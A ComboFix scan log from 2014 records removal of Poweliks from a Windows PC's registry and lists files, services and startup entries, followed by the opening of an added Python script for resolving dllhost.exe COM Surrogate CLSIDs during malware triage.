SP: ESET Endpoint Antivirus 5.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\Install.exe
c:\users\mike\GoToAssistDownloadHelper.exe
c:\users\networkadmin\GoToAssistDownloadHelper.exe
c:\windows\SysWow64\~GLH02ea.TMP
c:\windows\SysWow64\~GLH02eb.TMP
c:\windows\SysWow64\~GLH02ec.TMP
c:\windows\SysWow64\~GLH02ed.TMP
c:\windows\SysWow64\~GLH02ee.TMP
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-28 to 2014-08-28  )))))))))))))))))))))))))))))))
.
.
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\User1\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\networkadmin\AppData\Local\temp
2014-08-28 21:48 . 2014-08-28 21:48 -------- d-----w- c:\users\lynn\AppData\Local\temp
2014-08-28 21:18 . 2014-08-28 21:20 -------- d-----w- C:\FRST
2014-08-27 23:25 . 2014-08-27 23:25 -------- d-----w- c:\programdata\ATI
2014-08-27 23:23 . 2014-08-27 23:23 -------- d-----w- c:\program files\AMD
2014-08-27 21:55 . 2014-08-27 21:55 -------- d-----w- c:\users\networkadmin\AppData\Roaming\library_dir
2014-08-27 21:54 . 2014-08-28 20:51 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Raptr
2014-08-27 21:54 . 2014-08-27 21:55 -------- d-----w- c:\program files (x86)\Raptr
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\programdata\AMD
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\AMD AVT
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\Common Files\ATI Technologies
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files\Common Files\ATI Technologies
2014-08-27 21:54 . 2014-08-27 21:54 -------- d-----w- c:\program files (x86)\ATI Technologies
2014-08-27 21:53 . 2014-08-27 21:54 -------- d-----w- c:\programdata\Package Cache
2014-08-27 21:53 . 2014-08-27 21:54 -------- d-----w- c:\program files\ATI Technologies
2014-08-27 21:52 . 2014-08-27 21:52 -------- d-----w- C:\AMD
2014-08-27 20:33 . 2014-08-27 20:33 -------- d-----w- c:\users\networkadmin\AppData\Local\Adobe
2014-08-27 20:29 . 2014-08-27 20:29 -------- d-----w- c:\users\networkadmin\AppData\Local\Dell
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Dell
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\programdata\PCDr
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\programdata\PC-Doctor for Windows
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\program files\Dell Support Center
2014-08-27 20:06 . 2014-08-27 20:06 -------- d-----w- c:\program files\My Dell
2014-08-27 20:03 . 2014-08-27 20:03 -------- d-----w- c:\users\networkadmin\AppData\Roaming\PCDr
2014-08-27 20:03 . 2014-08-27 20:20 -------- d-----w- C:\temp
2014-08-27 18:50 . 2014-08-27 19:07 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-27 18:50 . 2014-08-27 18:50 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-08-27 18:50 . 2014-08-27 18:50 -------- d-----w- c:\programdata\Malwarebytes
2014-08-27 18:50 . 2014-05-12 14:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-27 18:50 . 2014-05-12 14:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-27 18:50 . 2014-05-12 14:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-27 18:49 . 2014-08-27 18:49 -------- d-----w- c:\users\networkadmin\AppData\Local\Programs
2014-08-27 18:31 . 2014-08-27 18:31 -------- d-----w- c:\users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 18:07 . 2014-08-27 18:07 -------- d-----w- c:\users\mike\AppData\Roaming\Toshiba
2014-08-21 16:36 . 2014-08-21 16:37 -------- d-----w- c:\programdata\Toshiba
2014-08-21 16:36 . 2013-06-04 13:59 41472 ----a-w- c:\windows\SysWow64\agphlink.tsp
2014-08-21 16:36 . 2013-06-04 13:58 220672 ----a-w- c:\windows\SysWow64\intrtspi.tsp
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Jabra
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Plantronics
2014-08-21 16:35 . 2013-10-16 16:08 81920 ----a-w- c:\windows\SysWow64\DumpWin.ocx
2014-08-21 16:35 . 2013-10-16 16:08 69632 ----a-w- c:\windows\SysWow64\playrec.ocx
2014-08-21 16:35 . 2013-10-16 16:08 61440 ----a-w- c:\windows\SysWow64\CTSMail.dll
2014-08-21 16:35 . 2013-10-16 16:08 40960 ----a-w- c:\windows\SysWow64\DDEWrap.ocx
2014-08-21 16:35 . 2013-10-16 16:08 131155 ----a-w- c:\windows\SysWow64\gtapiocx.ocx
2014-08-21 16:35 . 2013-06-04 14:16 127037 ----a-w- c:\windows\SysWow64\eClient.ocx
2014-08-21 16:35 . 2013-06-04 14:16 53306 ----a-w- c:\windows\SysWow64\sock.ocx
2014-08-21 16:35 . 2009-11-05 15:20 626688 ----a-w- c:\windows\SysWow64\msvcr80.dll
2014-08-21 16:35 . 2014-08-21 16:35 -------- d-----w- c:\program files (x86)\Toshiba
2014-08-21 16:35 . 2006-03-13 21:28 368912 ----a-w- c:\windows\SysWow64\vbar332.dll
2014-08-21 16:32 . 2014-08-21 16:32 -------- d-----w- c:\users\teleco3
2014-08-20 09:01 . 2014-08-20 09:01 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{1BDBBEDF-B4EB-4940-9A20-590E40F77114}\offreg.dll
2014-08-14 16:12 . 2014-08-14 16:12 -------- d-----w- c:\program files\ESET
2014-08-06 10:04 . 2014-03-25 02:43 14175744 ----a-w- c:\windows\system32\shell32.dll
2014-08-06 10:04 . 2014-06-03 10:02 1389568 ----a-w- c:\program files\Windows Journal\JNWDRV.dll
2014-08-06 10:04 . 2014-06-03 10:02 1380864 ----a-w- c:\program files\Windows Journal\JNTFiltr.dll
2014-08-06 10:04 . 2014-06-03 09:29 936960 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:04 . 2014-06-03 10:02 1719296 ----a-w- c:\program files\Windows Journal\NBDoc.DLL
2014-08-06 10:04 . 2014-06-03 10:02 1354240 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2014-08-06 10:03 . 2014-06-18 02:19 449024 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tabskb.dll
2014-08-06 10:03 . 2014-06-18 02:19 110592 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipBand.dll
2014-08-06 10:03 . 2014-06-18 02:18 224768 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TabTip.exe
2014-08-06 10:03 . 2014-06-18 02:17 544768 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\TipRes.dll
2014-08-06 10:03 . 2014-06-18 01:51 10240 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\TabTip32.exe
2014-08-06 10:03 . 2014-06-18 02:19 503296 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03 . 2014-06-18 02:19 1247232 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\tipskins.dll
2014-08-06 10:03 . 2014-06-18 02:18 692736 ----a-w- c:\windows\system32\osk.exe
2014-08-06 10:03 . 2014-06-18 01:52 348672 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll
2014-08-06 10:03 . 2014-06-18 01:51 646144 ----a-w- c:\windows\SysWow64\osk.exe
2014-08-06 10:03 . 2014-06-18 01:10 3157504 ----a-w- c:\windows\system32\win32k.sys
2014-08-06 10:02 . 2014-06-06 10:10 624128 ----a-w- c:\windows\system32\qedit.dll
2014-08-06 10:02 . 2014-06-06 09:44 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-08-06 10:02 . 2014-05-30 06:45 497152 ----a-w- c:\windows\system32\drivers\afd.sys
2014-08-06 10:00 . 2014-06-07 02:51 1392128 ----a-w- c:\windows\system32\wininet.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-08-28 20:50 . 2010-06-24 17:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-27 20:00 . 2013-02-12 03:07 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-27 20:00 . 2013-02-12 03:07 699568 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Spotify"="c:\users\mike\AppData\Roaming\Spotify\Spotify.exe" [2014-08-27 6621752]
"Spotify Web Helper"="c:\users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe" [2014-08-27 1245752]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe" [2012-06-07 56128]
"USB3MON"="c:\program files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" [2012-10-16 291648]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"Adobe Acrobat Speed Launcher"="c:\program files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" [2014-05-08 41336]
"Acrobat Assistant 8.0"="c:\program files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" [2014-05-08 840568]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" [2014-04-18 767200]
.
c:\users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Reminder.lnk - g:\checkin\Chklogin.exe [2011-3-29 1056768]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Call Manager.lnk - c:\program files (x86)\Toshiba\CallManager\CallManager.exe [2014-8-21 2098688]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 ESHASRV;ESET SHA Service;c:\program files\ESET\ESET NOD32 Antivirus\EShaSrv.exe;c:\program files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [x]
R3 netvsc;netvsc;c:\windows\system32\DRIVERS\netvsc60.sys;c:\windows\SYSNATIVE\DRIVERS\netvsc60.sys [x]
R3 SynthVid;SynthVid;c:\windows\system32\DRIVERS\VMBusVideoM.sys;c:\windows\SYSNATIVE\DRIVERS\VMBusVideoM.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WvPCR;WvPCR;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;c:\windows\system32\DRIVERS\iusb3hcs.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hcs.sys [x]
S1 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys;c:\windows\SYSNATIVE\DRIVERS\eamonm.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys;c:\windows\SYSNATIVE\DRIVERS\ehdrv.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 atashost;WebEx Service Host for Support Center;c:\windows\SysWOW64\atashost.exe;c:\windows\SysWOW64\atashost.exe [x]
S2 CmRegService;TSD Call Manager Configuration;c:\program files (x86)\Toshiba\CallManager\CmRegService.exe;c:\program files (x86)\Toshiba\CallManager\CmRegService.exe [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 EmbassyService;EmbassyService;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [x]
S2 epfwwfpr;epfwwfpr;c:\windows\system32\DRIVERS\epfwwfpr.sys;c:\windows\SYSNATIVE\DRIVERS\epfwwfpr.sys [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe;c:\program files\Intel\iCLS Client\HeciServer.exe [x]
S2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe;c:\windows\SYSNATIVE\IProsetMonitor.exe [x]
S2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [x]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]
S2 Wave Authentication Manager Service;Wave Authentication Manager Service;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [x]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW76.sys;c:\windows\SYSNATIVE\drivers\AtihdW76.sys [x]
S3 iusb3hub;Intel® USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\iusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hub.sys [x]
S3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;c:\windows\system32\DRIVERS\iusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3xhc.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-28 c:\windows\Tasks\TSOLnkUpdAlertTask.job
- c:\program files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe [2013-10-08 12:57]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EnabledUnlockedFDEIconOverlay]
@="{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}"
[HKEY_CLASSES_ROOT\CLSID\{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}]
2011-12-08 16:45 139128 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\UninitializedFdeIconOverlay]
@="{CF08DA3E-C97D-4891-A66B-E39B28DD270F}"
[HKEY_CLASSES_ROOT\CLSID\{CF08DA3E-C97D-4891-A66B-E39B28DD270F}]
2011-12-08 16:45 139128 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtDCpl64.exe" [2011-07-21 2907240]
"TdmNotify"="c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe" [2011-12-08 381296]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2013-02-14 4144944]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: Append Link Target to Existing PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert to Adobe PDF - c:\program files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~3\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 10.0.0.2
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Toolbar-Locked - (no file)
AddRemove-QuoteExpress Sheetmetal Workstation - c:\users\Public\Quote\UNWISE.EXE
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_176_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_176_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_176_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_176_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
c:\program files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
.
**************************************************************************
.
Completion time: 2014-08-28  14:57:26 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-28 21:57
.
Pre-Run: 418,595,016,704 bytes free
Post-Run: 433,461,686,272 bytes free
.
- - End Of File - - E605C64AF756CB28FD78C1F840BC8C59
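As an added worked example (not part of this thread, and not code from ComboFix, HitmanPro or FRST): the CLSID keys in the ComboFix dump above are exactly what a "dllhost.exe /Processid:{CLSID}" instance is resolved through, because the COM Surrogate loads whatever DLL is registered under that CLSID's InprocServer32. The Python below parses a .reg-style export in the same format, maps each dllhost command line to its registered server and flags CLSIDs that are unregistered, have no server path, or point outside the usual system directories. The two Flash CLSIDs in the sample are copied from the dump above; the loader.dll CLSID, the orphan CLSID, every dllhost command line and the trusted-directory list are constructed assumptions for this example.

```python
r"""Resolve which COM server each dllhost.exe (COM Surrogate) instance is hosting.

dllhost.exe is started as ``DllHost.exe /Processid:{CLSID}``; Windows looks the
CLSID up under HKCR\CLSID\{CLSID}\InprocServer32 (or LocalServer32) to find the
DLL/EXE that actually runs inside the surrogate.  This module parses a .reg-style
export (the format of the ComboFix dump in the thread) instead of reading the
live registry, so it runs offline on any platform.
"""
import re
from typing import Dict, List, Optional

# Regexes for the .reg export format: a bracketed key path, then name=value lines.
KEY_RE = re.compile(r"^\[(?P<path>.+)\]$")
CLSID_RE = re.compile(r"\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]{36}\})(?:\\(?P<sub>[^\\]+))?$")
DEFAULT_VALUE_RE = re.compile(r'^@="(?P<val>.*)"$')
PROCESSID_RE = re.compile(r"/Processid:(?P<clsid>\{[0-9A-Fa-f-]{36}\})", re.IGNORECASE)

SERVER_SUBKEYS = ("InprocServer32", "LocalServer32")
# Where a legitimately installed COM server is expected to live (assumption for
# this example; tune it for the environment being triaged).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample in the same style as the ComboFix dump.  The two Flash CLSIDs
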